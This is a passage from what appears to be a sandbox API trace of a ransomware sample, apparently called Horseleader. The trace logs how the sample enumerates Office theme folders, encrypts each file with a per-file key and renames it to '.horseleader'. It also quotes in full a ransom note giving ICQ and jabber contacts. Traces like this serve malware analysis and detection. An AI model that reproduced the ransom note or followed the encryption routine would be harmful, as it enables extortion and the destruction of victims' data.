files\\microsoft shared\\themes14\\blueprnt\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif.horseleader")) returned 1 [0246.223] GetProcessHeap () returned 0x780000 [0246.223] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.223] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad12690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x6b0f, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0246.223] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0246.223] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 81 [0246.223] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0246.223] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0246.224] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0246.224] lstrlenW (lpString=".testttjffg") returned 11 [0246.224] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0246.224] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.224] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.224] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.227] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 81 [0246.227] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0246.227] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=27407) returned 1 [0246.227] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.230] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.231] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.231] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1b0f, lpOverlapped=0x0) returned 1 [0246.231] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffe4f1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.232] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1b0f, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1b0f, lpOverlapped=0x0) returned 1 [0246.232] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.232] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.232] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.233] CloseHandle (hObject=0x1a4) returned 1 [0246.233] GetProcessHeap () returned 0x780000 [0246.233] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.233] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG.horseleader") returned 93 [0246.233] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png.horseleader")) returned 1 [0246.234] GetProcessHeap () returned 0x780000 [0246.234] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.234] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad12690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x6b0f, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0246.235] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0246.235] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\#Decrypt#.txt") returned 82 [0246.235] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0246.236] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0246.236] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0246.237] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0246.237] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0246.238] CloseHandle (hObject=0x158) returned 1 [0246.238] GetProcessHeap () returned 0x780000 [0246.238] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0246.238] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="BOLDSTRI", cAlternateFileName="")) returned 1 [0246.238] lstrcmpiW (lpString1="BOLDSTRI", lpString2="Windows") returned -1 [0246.238] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI") returned 68 [0246.238] lstrcmpW (lpString1="BOLDSTRI", lpString2=".") returned 1 [0246.238] lstrcmpW (lpString1="BOLDSTRI", lpString2="..") returned 1 [0246.238] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0246.239] GetProcessHeap () returned 0x780000 [0246.239] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0246.239] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\*") returned 70 [0246.239] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0246.241] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0246.241] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\.") returned 70 [0246.241] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0246.241] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0246.242] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0246.242] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\..") returned 71 [0246.242] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0246.242] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0246.242] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9250800, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51a15810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe9250800, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xeafa, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="BOLDSTRI.ELM", cAlternateFileName="")) returned 1 [0246.242] lstrcmpiW (lpString1="BOLDSTRI.ELM", lpString2="Windows") returned -1 [0246.242] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.ELM") returned 81 [0246.242] StrStrIW (lpFirst="BOLDSTRI.ELM", lpSrch=".horseleader") returned 0x0 [0246.242] lstrcmpW (lpString1="BOLDSTRI.ELM", lpString2="#Decrypt#.txt") returned 1 [0246.242] lstrcmpW (lpString1="BOLDSTRI.ELM", lpString2="_uninstalling_.png") returned 1 [0246.242] lstrlenW (lpString=".testttjffg") returned 11 [0246.242] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.ELM", lpSrch=".testttjffg") returned 0x0 [0246.242] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.242] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.243] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\boldstri.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.243] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.ELM") returned 81 [0246.244] StrStrW (lpFirst="BOLDSTRI.ELM", lpSrch=".txt") returned 0x0 [0246.244] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=60154) returned 1 [0246.244] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.247] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.247] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.248] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.248] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.248] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.248] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4afa, lpOverlapped=0x0) returned 1 [0246.249] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb506, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.249] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4afa, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4afa, lpOverlapped=0x0) returned 1 [0246.249] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.249] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.249] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.249] CloseHandle (hObject=0x1a4) returned 1 [0246.249] GetProcessHeap () returned 0x780000 [0246.250] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.250] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.ELM.horseleader") returned 93 [0246.250] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\boldstri.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\boldstri.elm.horseleader")) returned 1 [0246.251] GetProcessHeap () returned 0x780000 [0246.251] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.251] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x51a15810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x254, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="BOLDSTRI.INF", cAlternateFileName="")) returned 1 [0246.251] lstrcmpiW (lpString1="BOLDSTRI.INF", lpString2="Windows") returned -1 [0246.251] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.INF") returned 81 [0246.251] StrStrIW (lpFirst="BOLDSTRI.INF", lpSrch=".horseleader") returned 0x0 [0246.251] lstrcmpW (lpString1="BOLDSTRI.INF", lpString2="#Decrypt#.txt") returned 1 [0246.251] lstrcmpW (lpString1="BOLDSTRI.INF", lpString2="_uninstalling_.png") returned 1 [0246.251] lstrlenW (lpString=".testttjffg") returned 11 [0246.251] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.INF", lpSrch=".testttjffg") returned 0x0 [0246.251] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.251] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.251] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\boldstri.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.252] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.INF") returned 81 [0246.252] StrStrW (lpFirst="BOLDSTRI.INF", lpSrch=".txt") returned 0x0 [0246.252] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=596) returned 1 [0246.252] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x254, lpOverlapped=0x0) returned 1 [0246.253] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.253] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x254, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x254, lpOverlapped=0x0) returned 1 [0246.254] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.254] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.254] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.254] CloseHandle (hObject=0x1a4) returned 1 [0246.254] GetProcessHeap () returned 0x780000 [0246.254] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.254] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.INF.horseleader") returned 93 [0246.254] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\boldstri.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\boldstri.inf.horseleader")) returned 1 [0246.257] GetProcessHeap () returned 0x780000 [0246.257] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.257] FindNextFileW (in: 